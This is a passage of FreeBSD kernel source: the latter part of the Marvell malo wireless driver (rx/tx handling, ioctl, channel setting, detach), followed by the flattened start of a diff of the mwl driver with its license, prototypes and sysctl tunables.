callout_reset(&sc->malo_watchdog_timer, hz, malo_watchdog, sc); } static void malo_init(void *arg) { struct malo_softc *sc = (struct malo_softc *) arg; struct ifnet *ifp = sc->malo_ifp; struct ieee80211com *ic = ifp->if_l2com; DPRINTF(sc, MALO_DEBUG_ANY, "%s: if_flags 0x%x\n", __func__, ifp->if_flags); MALO_LOCK(sc); malo_init_locked(sc); MALO_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); /* start all vap's */ } /* * Set the multicast filter contents into the hardware. */ static void malo_setmcastfilter(struct malo_softc *sc) { struct ifnet *ifp = sc->malo_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ifmultiaddr *ifma; uint8_t macs[IEEE80211_ADDR_LEN * MALO_HAL_MCAST_MAX]; uint8_t *mp; int nmc; mp = macs; nmc = 0; if (ic->ic_opmode == IEEE80211_M_MONITOR || (ifp->if_flags & (IFF_ALLMULTI | IFF_PROMISC))) goto all; if_maddr_rlock(ifp); TAILQ_FOREACH(ifma, &ifp->if_multiaddrs, ifma_link) { if (ifma->ifma_addr->sa_family != AF_LINK) continue; if (nmc == MALO_HAL_MCAST_MAX) { ifp->if_flags |= IFF_ALLMULTI; if_maddr_runlock(ifp); goto all; } IEEE80211_ADDR_COPY(mp, LLADDR((struct sockaddr_dl *)ifma->ifma_addr)); mp += IEEE80211_ADDR_LEN, nmc++; } if_maddr_runlock(ifp); malo_hal_setmcast(sc->malo_mh, nmc, macs); all: /* * XXX we don't know how to set the f/w for supporting * IFF_ALLMULTI | IFF_PROMISC cases */ return; } static int malo_mode_init(struct malo_softc *sc) { struct ifnet *ifp = sc->malo_ifp; struct ieee80211com *ic = ifp->if_l2com; struct malo_hal *mh = sc->malo_mh; /* * NB: Ignore promisc in hostap mode; it's set by the * bridge. This is wrong but we have no way to * identify internal requests (from the bridge) * versus external requests such as for tcpdump. 
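 * So the promiscuous flag is simply suppressed while operating in hostap
 * mode and otherwise pushed to the firmware, along with the current
 * multicast filter.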
*/ malo_hal_setpromisc(mh, (ifp->if_flags & IFF_PROMISC) && ic->ic_opmode != IEEE80211_M_HOSTAP); malo_setmcastfilter(sc); return ENXIO; } static void malo_tx_draintxq(struct malo_softc *sc, struct malo_txq *txq) { struct ieee80211_node *ni; struct malo_txbuf *bf; u_int ix; /* * NB: this assumes output has been stopped and * we do not need to block malo_tx_tasklet */ for (ix = 0;; ix++) { MALO_TXQ_LOCK(txq); bf = STAILQ_FIRST(&txq->active); if (bf == NULL) { MALO_TXQ_UNLOCK(txq); break; } STAILQ_REMOVE_HEAD(&txq->active, bf_list); MALO_TXQ_UNLOCK(txq); #ifdef MALO_DEBUG if (sc->malo_debug & MALO_DEBUG_RESET) { struct ifnet *ifp = sc->malo_ifp; struct ieee80211com *ic = ifp->if_l2com; const struct malo_txrec *tr = mtod(bf->bf_m, const struct malo_txrec *); malo_printtxbuf(bf, txq->qnum, ix); ieee80211_dump_pkt(ic, (const uint8_t *)&tr->wh, bf->bf_m->m_len - sizeof(tr->fwlen), 0, -1); } #endif /* MALO_DEBUG */ bus_dmamap_unload(sc->malo_dmat, bf->bf_dmamap); ni = bf->bf_node; bf->bf_node = NULL; if (ni != NULL) { /* * Reclaim node reference. */ ieee80211_free_node(ni); } m_freem(bf->bf_m); bf->bf_m = NULL; MALO_TXQ_LOCK(txq); STAILQ_INSERT_TAIL(&txq->free, bf, bf_list); txq->nfree++; MALO_TXQ_UNLOCK(txq); } } static void malo_stop_locked(struct ifnet *ifp, int disable) { struct malo_softc *sc = ifp->if_softc; struct malo_hal *mh = sc->malo_mh; int i; DPRINTF(sc, MALO_DEBUG_ANY, "%s: invalid %u if_flags 0x%x\n", __func__, sc->malo_invalid, ifp->if_flags); MALO_LOCK_ASSERT(sc); if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) return; /* * Shutdown the hardware and driver: * disable interrupts * turn off the radio * drain and release tx queues * * Note that some of this work is not possible if the hardware * is gone (invalid). */ ifp->if_drv_flags &= ~IFF_DRV_RUNNING; callout_stop(&sc->malo_watchdog_timer); sc->malo_timer = 0; /* diable interrupt. */ malo_hal_intrset(mh, 0); /* turn off the radio. */ malo_hal_setradio(mh, 0, MHP_AUTO_PREAMBLE); /* drain and release tx queues. */ for (i = 0; i < MALO_NUM_TX_QUEUES; i++) malo_tx_draintxq(sc, &sc->malo_txq[i]); } static int malo_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { #define MALO_IS_RUNNING(ifp) \ ((ifp->if_flags & IFF_UP) && (ifp->if_drv_flags & IFF_DRV_RUNNING)) struct malo_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error = 0, startall = 0; MALO_LOCK(sc); switch (cmd) { case SIOCSIFFLAGS: if (MALO_IS_RUNNING(ifp)) { /* * To avoid rescanning another access point, * do not call malo_init() here. Instead, * only reflect promisc mode settings. */ malo_mode_init(sc); } else if (ifp->if_flags & IFF_UP) { /* * Beware of being called during attach/detach * to reset promiscuous mode. In that case we * will still be marked UP but not RUNNING. * However trying to re-init the interface * is the wrong thing to do as we've already * torn down much of our state. There's * probably a better way to deal with this. */ if (!sc->malo_invalid) { malo_init_locked(sc); startall = 1; } } else malo_stop_locked(ifp, 1); break; case SIOCGIFMEDIA: case SIOCSIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; default: error = ether_ioctl(ifp, cmd, data); break; } MALO_UNLOCK(sc); if (startall) ieee80211_start_all(ic); return error; #undef MALO_IS_RUNNING } /* * Callback from the 802.11 layer to update the slot time * based on the current setting. We use it to notify the * firmware of ERP changes and the f/w takes care of things * like slot time and preamble. 
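 * Only the short/long slot selection is forwarded (via
 * malo_hal_set_slot), and only once the interface is marked running.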
*/ static void malo_updateslot(struct ifnet *ifp) { struct malo_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct malo_hal *mh = sc->malo_mh; int error; /* NB: can be called early; suppress needless cmds */ if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; DPRINTF(sc, MALO_DEBUG_RESET, "%s: chan %u MHz/flags 0x%x %s slot, (ic_flags 0x%x)\n", __func__, ic->ic_curchan->ic_freq, ic->ic_curchan->ic_flags, ic->ic_flags & IEEE80211_F_SHSLOT ? "short" : "long", ic->ic_flags); if (ic->ic_flags & IEEE80211_F_SHSLOT) error = malo_hal_set_slot(mh, 1); else error = malo_hal_set_slot(mh, 0); if (error != 0) device_printf(sc->malo_dev, "setting %s slot failed\n", ic->ic_flags & IEEE80211_F_SHSLOT ? "short" : "long"); } static int malo_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ieee80211com *ic = vap->iv_ic; struct malo_softc *sc = ic->ic_ifp->if_softc; struct malo_hal *mh = sc->malo_mh; int error; DPRINTF(sc, MALO_DEBUG_STATE, "%s: %s -> %s\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate]); /* * Invoke the net80211 layer first so iv_bss is setup. */ error = MALO_VAP(vap)->malo_newstate(vap, nstate, arg); if (error != 0) return error; if (nstate == IEEE80211_S_RUN && vap->iv_state != IEEE80211_S_RUN) { struct ieee80211_node *ni = vap->iv_bss; enum ieee80211_phymode mode = ieee80211_chan2mode(ni->ni_chan); const struct ieee80211_txparam *tp = &vap->iv_txparms[mode]; DPRINTF(sc, MALO_DEBUG_STATE, "%s: %s(RUN): iv_flags 0x%08x bintvl %d bssid %s " "capinfo 0x%04x chan %d associd 0x%x mode %d rate %d\n", vap->iv_ifp->if_xname, __func__, vap->iv_flags, ni->ni_intval, ether_sprintf(ni->ni_bssid), ni->ni_capinfo, ieee80211_chan2ieee(ic, ic->ic_curchan), ni->ni_associd, mode, tp->ucastrate); malo_hal_setradio(mh, 1, (ic->ic_flags & IEEE80211_F_SHPREAMBLE) ? MHP_SHORT_PREAMBLE : MHP_LONG_PREAMBLE); malo_hal_setassocid(sc->malo_mh, ni->ni_bssid, ni->ni_associd); malo_hal_set_rate(mh, mode, tp->ucastrate == IEEE80211_FIXED_RATE_NONE ? 0 : malo_fix2rate(tp->ucastrate)); } return 0; } static int malo_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct malo_softc *sc = ifp->if_softc; struct malo_txbuf *bf; struct malo_txq *txq; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 || sc->malo_invalid) { ieee80211_free_node(ni); m_freem(m); return ENETDOWN; } /* * Grab a TX buffer and associated resources. Note that we depend * on the classification by the 802.11 layer to get to the right h/w * queue. Management frames must ALWAYS go on queue 1 but we * cannot just force that here because we may receive non-mgt frames. */ txq = &sc->malo_txq[0]; bf = malo_getbuf(sc, txq); if (bf == NULL) { /* XXX blocks other traffic */ ifp->if_drv_flags |= IFF_DRV_OACTIVE; ieee80211_free_node(ni); m_freem(m); return ENOBUFS; } /* * Pass the frame to the h/w for transmission. */ if (malo_tx_start(sc, ni, bf, m) != 0) { ifp->if_oerrors++; bf->bf_m = NULL; bf->bf_node = NULL; MALO_TXQ_LOCK(txq); STAILQ_INSERT_HEAD(&txq->free, bf, bf_list); txq->nfree++; MALO_TXQ_UNLOCK(txq); ieee80211_free_node(ni); return EIO; /* XXX */ } /* * NB: We don't need to lock against tx done because this just * prods the firmware to check the transmit descriptors. The firmware * will also start fetching descriptors by itself if it notices * new ones are present when it goes to deliver a tx done interrupt * to the host. 
So if we race with tx done processing it's ok. * Delivering the kick here rather than in malo_tx_start is * an optimization to avoid poking the firmware for each packet. * * NB: the queue id isn't used so 0 is ok. */ malo_hal_txstart(sc->malo_mh, 0/*XXX*/); return 0; } static void malo_sysctlattach(struct malo_softc *sc) { #ifdef MALO_DEBUG struct sysctl_ctx_list *ctx = device_get_sysctl_ctx(sc->malo_dev); struct sysctl_oid *tree = device_get_sysctl_tree(sc->malo_dev); sc->malo_debug = malo_debug; SYSCTL_ADD_INT(ctx, SYSCTL_CHILDREN(tree), OID_AUTO, "debug", CTLFLAG_RW, &sc->malo_debug, 0, "control debugging printfs"); #endif } static void malo_announce(struct malo_softc *sc) { struct ifnet *ifp = sc->malo_ifp; if_printf(ifp, "versions [hw %d fw %d.%d.%d.%d] (regioncode %d)\n", sc->malo_hwspecs.hwversion, (sc->malo_hwspecs.fw_releasenum >> 24) & 0xff, (sc->malo_hwspecs.fw_releasenum >> 16) & 0xff, (sc->malo_hwspecs.fw_releasenum >> 8) & 0xff, (sc->malo_hwspecs.fw_releasenum >> 0) & 0xff, sc->malo_hwspecs.regioncode); if (bootverbose || malo_rxbuf != MALO_RXBUF) if_printf(ifp, "using %u rx buffers\n", malo_rxbuf); if (bootverbose || malo_txbuf != MALO_TXBUF) if_printf(ifp, "using %u tx buffers\n", malo_txbuf); } /* * Convert net80211 channel to a HAL channel. */ static void malo_mapchan(struct malo_hal_channel *hc, const struct ieee80211_channel *chan) { hc->channel = chan->ic_ieee; *(uint32_t *)&hc->flags = 0; if (IEEE80211_IS_CHAN_2GHZ(chan)) hc->flags.freqband = MALO_FREQ_BAND_2DOT4GHZ; } /* * Set/change channels. If the channel is really being changed, * it's done by reseting the chip. To accomplish this we must * first cleanup any pending DMA, then restart stuff after a la * malo_init. */ static int malo_chan_set(struct malo_softc *sc, struct ieee80211_channel *chan) { struct malo_hal *mh = sc->malo_mh; struct malo_hal_channel hchan; DPRINTF(sc, MALO_DEBUG_RESET, "%s: chan %u MHz/flags 0x%x\n", __func__, chan->ic_freq, chan->ic_flags); /* * Convert to a HAL channel description with the flags constrained * to reflect the current operating mode. */ malo_mapchan(&hchan, chan); malo_hal_intrset(mh, 0); /* disable interrupts */ malo_hal_setchannel(mh, &hchan); malo_hal_settxpower(mh, &hchan); /* * Update internal state. 
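 * This records the new channel in the radiotap tx/rx headers and in
 * malo_curchan so captures and later commands see the correct frequency
 * and band flags.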
*/ sc->malo_tx_th.wt_chan_freq = htole16(chan->ic_freq); sc->malo_rx_th.wr_chan_freq = htole16(chan->ic_freq); if (IEEE80211_IS_CHAN_ANYG(chan)) { sc->malo_tx_th.wt_chan_flags = htole16(IEEE80211_CHAN_G); sc->malo_rx_th.wr_chan_flags = htole16(IEEE80211_CHAN_G); } else { sc->malo_tx_th.wt_chan_flags = htole16(IEEE80211_CHAN_B); sc->malo_rx_th.wr_chan_flags = htole16(IEEE80211_CHAN_B); } sc->malo_curchan = hchan; malo_hal_intrset(mh, sc->malo_imask); return 0; } static void malo_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct malo_softc *sc = ifp->if_softc; DPRINTF(sc, MALO_DEBUG_STATE, "%s\n", __func__); } static void malo_scan_end(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct malo_softc *sc = ifp->if_softc; DPRINTF(sc, MALO_DEBUG_STATE, "%s\n", __func__); } static void malo_set_channel(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct malo_softc *sc = ifp->if_softc; (void) malo_chan_set(sc, ic->ic_curchan); } static void malo_rx_proc(void *arg, int npending) { #define IEEE80211_DIR_DSTODS(wh) \ ((((const struct ieee80211_frame *)wh)->i_fc[1] & \ IEEE80211_FC1_DIR_MASK) == IEEE80211_FC1_DIR_DSTODS) struct malo_softc *sc = arg; struct ifnet *ifp = sc->malo_ifp; struct ieee80211com *ic = ifp->if_l2com; struct malo_rxbuf *bf; struct malo_rxdesc *ds; struct mbuf *m, *mnew; struct ieee80211_qosframe *wh; struct ieee80211_qosframe_addr4 *wh4; struct ieee80211_node *ni; int off, len, hdrlen, pktlen, rssi, ntodo; uint8_t *data, status; uint32_t readptr, writeptr; DPRINTF(sc, MALO_DEBUG_RX_PROC, "%s: pending %u rdptr(0x%x) 0x%x wrptr(0x%x) 0x%x\n", __func__, npending, sc->malo_hwspecs.rxdesc_read, malo_bar0_read4(sc, sc->malo_hwspecs.rxdesc_read), sc->malo_hwspecs.rxdesc_write, malo_bar0_read4(sc, sc->malo_hwspecs.rxdesc_write)); readptr = malo_bar0_read4(sc, sc->malo_hwspecs.rxdesc_read); writeptr = malo_bar0_read4(sc, sc->malo_hwspecs.rxdesc_write); if (readptr == writeptr) return; bf = sc->malo_rxnext; for (ntodo = malo_rxquota; ntodo > 0 && readptr != writeptr; ntodo--) { if (bf == NULL) { bf = STAILQ_FIRST(&sc->malo_rxbuf); break; } ds = bf->bf_desc; if (bf->bf_m == NULL) { /* * If data allocation failed previously there * will be no buffer; try again to re-populate it. * Note the firmware will not advance to the next * descriptor with a dma buffer so we must mimic * this or we'll get out of sync. */ DPRINTF(sc, MALO_DEBUG_ANY, "%s: rx buf w/o dma memory\n", __func__); (void)malo_rxbuf_init(sc, bf); break; } MALO_RXDESC_SYNC(sc, ds, BUS_DMASYNC_POSTREAD | BUS_DMASYNC_POSTWRITE); if (ds->rxcontrol != MALO_RXD_CTRL_DMA_OWN) break; readptr = le32toh(ds->physnext); #ifdef MALO_DEBUG if (sc->malo_debug & MALO_DEBUG_RECV_DESC) malo_printrxbuf(bf, 0); #endif status = ds->status; if (status & MALO_RXD_STATUS_DECRYPT_ERR_MASK) { ifp->if_ierrors++; goto rx_next; } /* * Sync the data buffer. */ len = le16toh(ds->pktlen); bus_dmamap_sync(sc->malo_dmat, bf->bf_dmamap, BUS_DMASYNC_POSTREAD); /* * The 802.11 header is provided all or in part at the front; * use it to calculate the true size of the header that we'll * construct below. We use this to figure out where to copy * payload prior to constructing the header. */ m = bf->bf_m; data = mtod(m, uint8_t *); hdrlen = ieee80211_anyhdrsize(data + sizeof(uint16_t)); off = sizeof(uint16_t) + sizeof(struct ieee80211_frame_addr4); /* * Calculate RSSI. 
XXX wrong */ rssi = 2 * ((int) ds->snr - ds->nf); /* NB: .5 dBm */ if (rssi > 100) rssi = 100; pktlen = hdrlen + (len - off); /* * NB: we know our frame is at least as large as * IEEE80211_MIN_LEN because there is a 4-address frame at * the front. Hence there's no need to vet the packet length. * If the frame in fact is too small it should be discarded * at the net80211 layer. */ /* XXX don't need mbuf, just dma buffer */ mnew = malo_getrxmbuf(sc, bf); if (mnew == NULL) { ifp->if_ierrors++; goto rx_next; } /* * Attach the dma buffer to the mbuf; malo_rxbuf_init will * re-setup the rx descriptor using the replacement dma * buffer we just installed above. */ bf->bf_m = mnew; m->m_data += off - hdrlen; m->m_pkthdr.len = m->m_len = pktlen; m->m_pkthdr.rcvif = ifp; /* * Piece 802.11 header together. */ wh = mtod(m, struct ieee80211_qosframe *); /* NB: don't need to do this sometimes but ... */ /* XXX special case so we can memcpy after m_devget? */ ovbcopy(data + sizeof(uint16_t), wh, hdrlen); if (IEEE80211_QOS_HAS_SEQ(wh)) { if (IEEE80211_DIR_DSTODS(wh)) { wh4 = mtod(m, struct ieee80211_qosframe_addr4*); *(uint16_t *)wh4->i_qos = ds->qosctrl; } else { *(uint16_t *)wh->i_qos = ds->qosctrl; } } if (ieee80211_radiotap_active(ic)) { sc->malo_rx_th.wr_flags = 0; sc->malo_rx_th.wr_rate = ds->rate; sc->malo_rx_th.wr_antsignal = rssi; sc->malo_rx_th.wr_antnoise = ds->nf; } #ifdef MALO_DEBUG if (IFF_DUMPPKTS_RECV(sc, wh)) { ieee80211_dump_pkt(ic, mtod(m, caddr_t), len, ds->rate, rssi); } #endif ifp->if_ipackets++; /* dispatch */ ni = ieee80211_find_rxnode(ic, (struct ieee80211_frame_min *)wh); if (ni != NULL) { (void) ieee80211_input(ni, m, rssi, ds->nf); ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, rssi, ds->nf); rx_next: /* NB: ignore ENOMEM so we process more descriptors */ (void) malo_rxbuf_init(sc, bf); bf = STAILQ_NEXT(bf, bf_list); } malo_bar0_write4(sc, sc->malo_hwspecs.rxdesc_read, readptr); sc->malo_rxnext = bf; if ((ifp->if_drv_flags & IFF_DRV_OACTIVE) == 0 && !IFQ_IS_EMPTY(&ifp->if_snd)) malo_start(ifp); #undef IEEE80211_DIR_DSTODS } static void malo_stop(struct ifnet *ifp, int disable) { struct malo_softc *sc = ifp->if_softc; MALO_LOCK(sc); malo_stop_locked(ifp, disable); MALO_UNLOCK(sc); } /* * Reclaim all tx queue resources. */ static void malo_tx_cleanup(struct malo_softc *sc) { int i; for (i = 0; i < MALO_NUM_TX_QUEUES; i++) malo_tx_cleanupq(sc, &sc->malo_txq[i]); } int malo_detach(struct malo_softc *sc) { struct ifnet *ifp = sc->malo_ifp; struct ieee80211com *ic = ifp->if_l2com; DPRINTF(sc, MALO_DEBUG_ANY, "%s: if_flags %x\n", __func__, ifp->if_flags); malo_stop(ifp, 1); if (sc->malo_tq != NULL) { taskqueue_drain(sc->malo_tq, &sc->malo_rxtask); taskqueue_drain(sc->malo_tq, &sc->malo_txtask); taskqueue_free(sc->malo_tq); sc->malo_tq = NULL; } /* * NB: the order of these is important: * o call the 802.11 layer before detaching the hal to * insure callbacks into the driver to delete global * key cache entries can be handled * o reclaim the tx queue data structures after calling * the 802.11 layer as we'll get called back to reclaim * node state and potentially want to use them * o to cleanup the tx queues the hal is called, so detach * it last * Other than that, it's straightforward... 
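 * (the watchdog callout is also drained before the DMA and tx queue
 * state is torn down)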
*/ ieee80211_ifdetach(ic); callout_drain(&sc->malo_watchdog_timer); malo_dma_cleanup(sc); malo_tx_cleanup(sc); malo_hal_detach(sc->malo_mh); if_free(ifp); MALO_LOCK_DESTROY(sc); return 0; } void malo_shutdown(struct malo_softc *sc) { malo_stop(sc->malo_ifp, 1); } void malo_suspend(struct malo_softc *sc) { struct ifnet *ifp = sc->malo_ifp; DPRINTF(sc, MALO_DEBUG_ANY, "%s: if_flags %x\n", __func__, ifp->if_flags); malo_stop(ifp, 1); } void malo_resume(struct malo_softc *sc) { struct ifnet *ifp = sc->malo_ifp; DPRINTF(sc, MALO_DEBUG_ANY, "%s: if_flags %x\n", __func__, ifp->if_flags); if (ifp->if_flags & IFF_UP) malo_init(sc); } diff --git a/sys/dev/mwl/if_mwl.c b/sys/dev/mwl/if_mwl.c index 8a3aca80a9fd..67fba35bcf8b 100644 --- a/sys/dev/mwl/if_mwl.c +++ b/sys/dev/mwl/if_mwl.c @@ -1,5053 +1,5054 @@ /*- * Copyright (c) 2007-2009 Sam Leffler, Errno Consulting * Copyright (c) 2007-2008 Marvell Semiconductor, Inc. * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer, * without modification. * 2. Redistributions in binary form must reproduce at minimum a disclaimer * similar to the "NO WARRANTY" disclaimer below ("Disclaimer") and any * redistribution must be conditioned upon including a substantially * similar Disclaimer requirement for further binary redistribution. * * NO WARRANTY * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF NONINFRINGEMENT, MERCHANTIBILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR SPECIAL, EXEMPLARY, * OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER * IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGES. */ #include __FBSDID("$FreeBSD$"); /* * Driver for the Marvell 88W8363 Wireless LAN controller. 
*/ #include "opt_inet.h" #include "opt_mwl.h" #include "opt_wlan.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef INET #include #include #endif /* INET */ #include #include /* idiomatic shorthands: MS = mask+shift, SM = shift+mask */ #define MS(v,x) (((v) & x) >> x##_S) #define SM(v,x) (((v) << x##_S) & x) static struct ieee80211vap *mwl_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void mwl_vap_delete(struct ieee80211vap *); static int mwl_setupdma(struct mwl_softc *); static int mwl_hal_reset(struct mwl_softc *sc); static int mwl_init_locked(struct mwl_softc *); static void mwl_init(void *); static void mwl_stop_locked(struct ifnet *, int); static int mwl_reset(struct ieee80211vap *, u_long); static void mwl_stop(struct ifnet *, int); static void mwl_start(struct ifnet *); static int mwl_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static int mwl_media_change(struct ifnet *); static void mwl_watchdog(void *); static int mwl_ioctl(struct ifnet *, u_long, caddr_t); static void mwl_radar_proc(void *, int); static void mwl_chanswitch_proc(void *, int); static void mwl_bawatchdog_proc(void *, int); static int mwl_key_alloc(struct ieee80211vap *, struct ieee80211_key *, ieee80211_keyix *, ieee80211_keyix *); static int mwl_key_delete(struct ieee80211vap *, const struct ieee80211_key *); static int mwl_key_set(struct ieee80211vap *, const struct ieee80211_key *, const uint8_t mac[IEEE80211_ADDR_LEN]); static int mwl_mode_init(struct mwl_softc *); static void mwl_update_mcast(struct ifnet *); static void mwl_update_promisc(struct ifnet *); static void mwl_updateslot(struct ifnet *); static int mwl_beacon_setup(struct ieee80211vap *); static void mwl_beacon_update(struct ieee80211vap *, int); #ifdef MWL_HOST_PS_SUPPORT static void mwl_update_ps(struct ieee80211vap *, int); static int mwl_set_tim(struct ieee80211_node *, int); #endif static int mwl_dma_setup(struct mwl_softc *); static void mwl_dma_cleanup(struct mwl_softc *); static struct ieee80211_node *mwl_node_alloc(struct ieee80211vap *, const uint8_t [IEEE80211_ADDR_LEN]); static void mwl_node_cleanup(struct ieee80211_node *); static void mwl_node_drain(struct ieee80211_node *); static void mwl_node_getsignal(const struct ieee80211_node *, int8_t *, int8_t *); static void mwl_node_getmimoinfo(const struct ieee80211_node *, struct ieee80211_mimo_info *); static int mwl_rxbuf_init(struct mwl_softc *, struct mwl_rxbuf *); static void mwl_rx_proc(void *, int); static void mwl_txq_init(struct mwl_softc *sc, struct mwl_txq *, int); static int mwl_tx_setup(struct mwl_softc *, int, int); static int mwl_wme_update(struct ieee80211com *); static void mwl_tx_cleanupq(struct mwl_softc *, struct mwl_txq *); static void mwl_tx_cleanup(struct mwl_softc *); static uint16_t mwl_calcformat(uint8_t rate, const struct ieee80211_node *); static int mwl_tx_start(struct mwl_softc *, struct ieee80211_node *, struct mwl_txbuf *, struct mbuf *); static void mwl_tx_proc(void *, int); static int mwl_chan_set(struct mwl_softc *, struct ieee80211_channel *); static void mwl_draintxq(struct mwl_softc *); static void mwl_cleartxq(struct mwl_softc *, struct ieee80211vap *); static int 
mwl_recv_action(struct ieee80211_node *, const struct ieee80211_frame *, const uint8_t *, const uint8_t *); static int mwl_addba_request(struct ieee80211_node *, struct ieee80211_tx_ampdu *, int dialogtoken, int baparamset, int batimeout); static int mwl_addba_response(struct ieee80211_node *, struct ieee80211_tx_ampdu *, int status, int baparamset, int batimeout); static void mwl_addba_stop(struct ieee80211_node *, struct ieee80211_tx_ampdu *); static int mwl_startrecv(struct mwl_softc *); static MWL_HAL_APMODE mwl_getapmode(const struct ieee80211vap *, struct ieee80211_channel *); static int mwl_setapmode(struct ieee80211vap *, struct ieee80211_channel*); static void mwl_scan_start(struct ieee80211com *); static void mwl_scan_end(struct ieee80211com *); static void mwl_set_channel(struct ieee80211com *); static int mwl_peerstadb(struct ieee80211_node *, int aid, int staid, MWL_HAL_PEERINFO *pi); static int mwl_localstadb(struct ieee80211vap *); static int mwl_newstate(struct ieee80211vap *, enum ieee80211_state, int); static int allocstaid(struct mwl_softc *sc, int aid); static void delstaid(struct mwl_softc *sc, int staid); static void mwl_newassoc(struct ieee80211_node *, int); static void mwl_agestations(void *); static int mwl_setregdomain(struct ieee80211com *, struct ieee80211_regdomain *, int, struct ieee80211_channel []); static void mwl_getradiocaps(struct ieee80211com *, int, int *, struct ieee80211_channel []); static int mwl_getchannels(struct mwl_softc *); static void mwl_sysctlattach(struct mwl_softc *); static void mwl_announce(struct mwl_softc *); SYSCTL_NODE(_hw, OID_AUTO, mwl, CTLFLAG_RD, 0, "Marvell driver parameters"); static int mwl_rxdesc = MWL_RXDESC; /* # rx desc's to allocate */ SYSCTL_INT(_hw_mwl, OID_AUTO, rxdesc, CTLFLAG_RW, &mwl_rxdesc, 0, "rx descriptors allocated"); static int mwl_rxbuf = MWL_RXBUF; /* # rx buffers to allocate */ SYSCTL_INT(_hw_mwl, OID_AUTO, rxbuf, CTLFLAG_RW, &mwl_rxbuf, 0, "rx buffers allocated"); TUNABLE_INT("hw.mwl.rxbuf", &mwl_rxbuf); static int mwl_txbuf = MWL_TXBUF; /* # tx buffers to allocate */ SYSCTL_INT(_hw_mwl, OID_AUTO, txbuf, CTLFLAG_RW, &mwl_txbuf, 0, "tx buffers allocated"); TUNABLE_INT("hw.mwl.txbuf", &mwl_txbuf); static int mwl_txcoalesce = 8; /* # tx packets to q before poking f/w*/ SYSCTL_INT(_hw_mwl, OID_AUTO, txcoalesce, CTLFLAG_RW, &mwl_txcoalesce, 0, "tx buffers to send at once"); TUNABLE_INT("hw.mwl.txcoalesce", &mwl_txcoalesce); static int mwl_rxquota = MWL_RXBUF; /* # max buffers to process */ SYSCTL_INT(_hw_mwl, OID_AUTO, rxquota, CTLFLAG_RW, &mwl_rxquota, 0, "max rx buffers to process per interrupt"); TUNABLE_INT("hw.mwl.rxquota", &mwl_rxquota); static int mwl_rxdmalow = 3; /* # min buffers for wakeup */ SYSCTL_INT(_hw_mwl, OID_AUTO, rxdmalow, CTLFLAG_RW, &mwl_rxdmalow, 0, "min free rx buffers before restarting traffic"); TUNABLE_INT("hw.mwl.rxdmalow", &mwl_rxdmalow); #ifdef MWL_DEBUG static int mwl_debug = 0; SYSCTL_INT(_hw_mwl, OID_AUTO, debug, CTLFLAG_RW, &mwl_debug, 0, "control debugging printfs"); TUNABLE_INT("hw.mwl.debug", &mwl_debug); enum { MWL_DEBUG_XMIT = 0x00000001, /* basic xmit operation */ MWL_DEBUG_XMIT_DESC = 0x00000002, /* xmit descriptors */ MWL_DEBUG_RECV = 0x00000004, /* basic recv operation */ MWL_DEBUG_RECV_DESC = 0x00000008, /* recv descriptors */ MWL_DEBUG_RESET = 0x00000010, /* reset processing */ MWL_DEBUG_BEACON = 0x00000020, /* beacon handling */ MWL_DEBUG_INTR = 0x00000040, /* ISR */ MWL_DEBUG_TX_PROC = 0x00000080, /* tx ISR proc */ MWL_DEBUG_RX_PROC = 0x00000100, /* rx ISR proc */ 
